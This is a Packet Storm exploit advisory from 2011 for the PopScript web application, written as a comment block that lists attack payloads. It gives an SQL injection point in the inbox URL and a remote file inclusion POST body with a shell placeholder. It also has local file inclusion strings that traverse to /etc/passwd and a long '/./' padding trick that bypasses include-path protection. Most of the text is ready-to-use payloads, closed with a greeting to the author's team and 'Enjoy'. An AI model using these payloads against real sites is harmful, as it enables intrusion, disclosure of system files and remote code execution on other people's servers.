PopScript Local File Inclusion / SQL Injection

2011-06-07T00:00:00
ID PACKETSTORM:102033
Type packetstorm
Reporter NassRawI
Modified 2011-06-07T00:00:00

Description

                                        
                                            `##########################################################  
# Exploit Title: PopScript Multiple Vulnerabilities  
# home : http://www.D99Y.com  
# Google Dork: Do as you would be done by ; )  
# Date: 5/6/2011   
# Author: NassRawI  
# Software Link: http://www.popscript.com/  
##########################################################  
#  
# [1] SQL injection  
#  
# http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]  
#  
# [2] File inclusion = require()   
#  
# Remote File inclusion :  
#  
# exploit :  
#  
# send in index.php [ post ]  
#  
# email=root@d99y.com&mode=[Shell txt]?&password=nassrawi&remember=ON  
#  
# Local :  
#  
# exploit :  
#  
# send in index.php [ post ]  
#  
# email=root@d99y.com&mode=nassrawi../../../../../../etc/passwd&password=nassrawi  
#  
# You can skip protection include_path ; )  
#  
# email=root@d99y.com&mode=nassrawi../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././  
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.  
/./././././././././././././././././././././././././././././.!  
/./././.  
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.  
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././  
././././././././././././././././././././././././././././././!  
././././  
./././././.&password=nassrawi  
#  
#  
##########################################################  
  
Greetz :  
  
D99Y Team and all members D99Y.CoM  
  
Enjoy ; )  
`